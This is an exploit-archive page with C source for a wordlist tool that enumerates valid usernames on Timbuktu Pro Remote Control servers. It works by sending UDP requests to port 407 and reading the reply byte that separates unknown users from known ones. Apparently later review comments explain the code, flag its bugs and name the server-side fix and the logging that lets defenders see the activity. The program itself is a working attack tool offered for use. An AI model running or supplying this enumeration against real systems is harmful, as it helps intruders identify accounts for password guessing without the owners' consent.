
timbuktu_userbrute.c

timbuktu_userbrute.c
Posted Mar 28, 2005
Authored by Conehead

Timbuktu Pro Remote Control user enumeration program. Wordlist-based bruteforce tool that checks whether a given username exists on the target server or not, which is possible due to a difference in the error message returned when the username is invalid versus when the password is invalid.

tags | exploit, remote
SHA-256 | c1316cb0a42dbdc8c71076a0435e16160c2cbab2ffe04ba0757c56504e85b033

timbuktu_userbrute.c

/*
Timbuktu Pro Remote Control Program - Registered User Guessing Tool by Conehead 03/05
bruteforce registered usernames against target Timbuktu remote control server PLU database
classic bone-headed mistake of a program differentiating between bad usernames and passwords leads to this type of thing
usernames are not case-sensitive and run from 1 to 31 characters
there are no registered user account lockouts, but server does log attempts
compile: gcc
usage: timbuktu_userbrute <Timbuktu server ip address> <file of single-line usernames> [<number of simultaneous connections>]
example: timbuktu_userbrute 127.0.0.1 usernames.txt 1
Note: It appears that running with more than one simultaneous connection causes confusion and produces false negatives. Run at your own risk! Might try running singles in a distributed cracking cluster fashion.
*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define SERV_HOST_PORT 407
#define MAXMESSLEN 2048
#define MAXUSERNAMELEN 31

/* functions:
void UDP_handshake(int*,struct sockaddr_in)
void timbuktu_cred_exchange(int*,int,char*)
void timbuktu_cli(int*,struct sockaddr_in,char*) */

/*
 * Replace the descriptor held in *sockfd with a fresh UDP socket that is
 * connect()ed to serv_addr, so later send/receive calls need no address.
 *
 * sockfd    - in/out: the old descriptor is closed first, then overwritten
 *             with the new socket.
 * serv_addr - server address, passed by value.
 *
 * Any failure prints a message with perror() and terminates the process.
 * The return type is int only because the original definition relied on
 * implicit int; no value is returned and the callers in this file ignore it.
 *
 * NOTE(review): the old value of *sockfd is closed unconditionally; main()
 * in this file passes the address of a variable it never initialises.
 */
int UDP_handshake(int *sockfd, struct sockaddr_in serv_addr)
{
    int fd;

    /* Release whatever the caller had stored before opening a new socket. */
    close(*sockfd);

    fd = socket(AF_INET, SOCK_DGRAM, 0);
    *sockfd = fd;
    if (fd < 0) {
        perror("Client: can't open datagram socket");
        exit(-1);
    }

    /* connect() on a datagram socket only fixes the default peer address. */
    if (connect(fd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) {
        perror("Client: can't connect to server");
        exit(-1);
    }
}

/*
 * Send one request datagram carrying `username` on the connected UDP socket
 * and classify the server's reply.
 *
 * sockfd       - UDP socket already connect()ed to the server.
 * username_len - number of bytes of `username` to place in the request.
 * username     - NUL-terminated candidate name (also printed on a match).
 *
 * Request layout as built here: a fixed 24-byte header, one length byte at
 * offset 24, then the username starting at offset 25. Only 25+username_len
 * bytes are transmitted.
 *
 * Reply handling: at least 36 bytes must come back; a reply whose byte at
 * offset 3 equals 0xb7 is reported as "existing username". Per the file
 * header, the server answers differently for an unknown user than for a known
 * user with a bad password. That difference is the weakness being measured,
 * and a uniform failure reply on the server side removes the signal.
 *
 * A short send or short receive prints a perror() message and exits.
 * The return type is int only because the original relied on implicit int;
 * nothing is returned.
 */
int timbuktu_cred_exchange(int sockfd, int username_len, char username[MAXUSERNAMELEN])
{
    char message[MAXMESSLEN];
    char hex_value[4];
    int wire_len = 25 + username_len;

    /* Fixed request header. */
    memcpy(message, "\x00\x23\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00", 24);

    /*
     * Length byte. The original enumerated 1..31 in a switch with no default,
     * so a length outside that range leaves hex_value unset; that is kept
     * as-is here (main() only forwards names of at most 31 characters, but
     * an empty line still yields length 0).
     */
    if (username_len >= 1 && username_len <= 31) {
        hex_value[0] = (char) username_len;
        hex_value[1] = '\0';
    }
    message[24] = hex_value[0];

    /* Zero offsets 25..63 (7 + 16 + 16 bytes), then drop the name in place. */
    memset(message + 25, 0, 7 + 16 + 16);
    memcpy(message + 25, username, username_len);

    if (sendto(sockfd, message, wire_len, 0, NULL, 0) < wire_len) {
        perror("Client: sendto error on socket");
        exit(-1);
    }

    /* Blocking read; anything shorter than 36 bytes is treated as an error. */
    if (recvfrom(sockfd, message, 36, 0, NULL, 0) < 36) {
        perror("Client: recvfrom error");
        exit(-1);
    }

    /* Byte 3 of the reply is the only field inspected. */
    if ((unsigned char) message[3] == 0xb7) {
        printf("%s is an existing username on the Timbuktu server!\n",username);
    }
}

/*
 * Run one complete check for a single username: open a fresh connected UDP
 * socket via UDP_handshake(), then perform the request/reply exchange via
 * timbuktu_cred_exchange().
 *
 * sockfd    - in/out descriptor slot handed to UDP_handshake().
 * serv_addr - server address, passed by value.
 * username  - NUL-terminated candidate name; its strlen() is used as the
 *             length placed in the request.
 *
 * Both helpers exit the process on error. The return type is int only because
 * the original relied on implicit int; nothing is returned.
 */
int timbuktu_cli(int *sockfd, struct sockaddr_in serv_addr, char username[MAXUSERNAMELEN])
{
    UDP_handshake(sockfd, serv_addr);

    /* Narrow to int explicitly: the callee takes the length as an int. */
    timbuktu_cred_exchange(*sockfd, (int) strlen(username), username);
}

/*
 * Entry point. Arguments (see the usage line in the file header):
 *   argv[1] - server address or host name
 *   argv[2] - file with one username per line
 *   argv[3] - optional number of child processes to run before waiting
 *
 * Builds serv_addr for UDP port SERV_HOST_PORT, then forks one child per
 * accepted line of the username file; each child calls timbuktu_cli() once
 * and exits. Every candidate name therefore produces one request datagram,
 * and the file header states that the server logs these attempts, so that
 * log is where this activity shows up for a defender.
 *
 * NOTE(review): the file includes neither <stdlib.h>, <unistd.h> nor
 * <sys/wait.h>, so exit(), close(), fork(), atoi() and wait() are used
 * without declarations.
 */
main(argc, argv)
int argc;
char *argv[];
{
char *host_address;
struct in_addr *ptr;
struct hostent *hostptr;
int port_number = SERV_HOST_PORT;
/* Line buffer for fgets(); holds at most 39 characters plus the NUL. */
char user[40];
char username[MAXUSERNAMELEN+1];
/* NOTE(review): never initialised in this function, yet closed below and
   closed again (via its address) at the start of UDP_handshake(). */
int sockfd;
/* NOTE(review): cli_addr is declared but not used anywhere in main(). */
struct sockaddr_in cli_addr,
serv_addr;
FILE *fileptr;
int num_connects=1;
int child=0;
int id;
int status;

/* NOTE(review): when argc <= 1 this block is skipped and host_address is
   still uninitialised when inet_addr() reads it further down. */
if (argc > 1) {
host_address = argv[1];
/* A leading digit is taken to mean a dotted-quad literal: no lookup. */
if (*host_address >= '0' && *host_address <= '9') { ;
}
else {
hostptr = gethostbyname(host_address);
if (hostptr == NULL) {
/* NOTE(review): perror() reports errno; whether gethostbyname() sets
   errno on failure is not established here, so confirm the message. */
perror("gethostby error");
exit(-1);
}
switch (hostptr->h_addrtype) {
case AF_INET:
/* Use the first address in the list, converted back to text form. */
ptr = (struct in_addr *) *hostptr->h_addr_list;
host_address = inet_ntoa(*ptr);
break;
default:
perror("unknown address type");
exit(-1);
}
}
}

/* Fill in the IPv4 server address; the inet_addr() result is not checked. */
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = inet_addr(host_address);
serv_addr.sin_port = htons(port_number);

/* NOTE(review): atoi() gives no error indication. The wait below fires only
   when child == num_connects, and child is at least 1 by then, so a value of
   0 or less means the parent never waits between forks. */
if (argc >3) {
num_connects=atoi(argv[3]);
}

/* Without a username file nothing is sent and the program exits quietly. */
if (argc >2) {
fileptr = fopen(argv[2],"r");
if (fileptr == NULL) {
perror("fopen error");
exit(-1);
}
while (fgets(user,40,fileptr)) {
/* Accept chunks of at most MAXUSERNAMELEN characters plus the newline.
   NOTE(review): fgets() hands back a longer line in several chunks, so the
   tail of an over-long line can pass this test as a name of its own. */
if (strlen(user) < MAXUSERNAMELEN+2) {
child++;
/* Zero the whole username buffer so the copy below stays NUL-terminated. */
bcopy("\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",username,MAXUSERNAMELEN+1);
/* Copy everything except the last character, assumed to be the newline.
   NOTE(review): a final line with no trailing newline loses its last
   character here. */
strncpy(username,user,strlen(user)-1);
id = fork();
if (id < 0) {
perror("An error occurred spawning the child");
exit(-1);
}
if (id == 0) {
/* Child: one exchange for this username, then exit. */
timbuktu_cli(&sockfd,serv_addr,username);
exit(0);
}
/* Parent: after num_connects forks, wait for one child to finish and
   restart the count. */
if (child==num_connects) {
wait(&status);
child=0;
}
}
}
/* NOTE(review): the parent never opened a socket; sockfd is uninitialised
   here. Children still running at this point are not waited for. */
close(sockfd);
}
exit(0);
}